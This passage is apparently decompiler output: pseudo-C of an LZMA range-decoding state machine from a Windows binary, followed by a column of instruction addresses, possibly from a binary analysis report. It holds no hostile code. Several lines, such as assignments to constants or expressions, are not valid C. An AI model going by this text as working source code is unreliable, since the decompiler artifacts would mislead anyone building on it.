											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                                            0x00406566
                                                                                                            0x00406566
                                                                                                            0x00406566
                                                                                                            0x00406566
                                                                                                            0x0040656c
                                                                                                            0x00406570
                                                                                                            0x00406574
                                                                                                            0x0040657e
                                                                                                            0x0040658c
                                                                                                            0x00406862
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00406899
                                                                                                            0x00406899
                                                                                                            0x0040689d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040689f
                                                                                                            0x004068a8
                                                                                                            0x004068ae
                                                                                                            0x004068b1
                                                                                                            0x004068b4
                                                                                                            0x004068b7
                                                                                                            0x004068ba
                                                                                                            0x004068c0
                                                                                                            0x004068d9
                                                                                                            0x004068dc
                                                                                                            0x004068e8
                                                                                                            0x004068e9
                                                                                                            0x004068ec
                                                                                                            0x004068c2
                                                                                                            0x004068c2
                                                                                                            0x004068d1
                                                                                                            0x004068d4
                                                                                                            0x004068d4
                                                                                                            0x004068f6
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406899
                                                                                                            0x0040689d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x004068f8
                                                                                                            0x00406871
                                                                                                            0x00406875
                                                                                                            0x004069ad
                                                                                                            0x004069ad
                                                                                                            0x004069b7
                                                                                                            0x004069bf
                                                                                                            0x004069c6
                                                                                                            0x004069c8
                                                                                                            0x004069cf
                                                                                                            0x004069d3
                                                                                                            0x004069d3
                                                                                                            0x0040687b
                                                                                                            0x00406881
                                                                                                            0x00406888
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406893
                                                                                                            0x00000000
                                                                                                            0x00406893
                                                                                                            0x004068fd
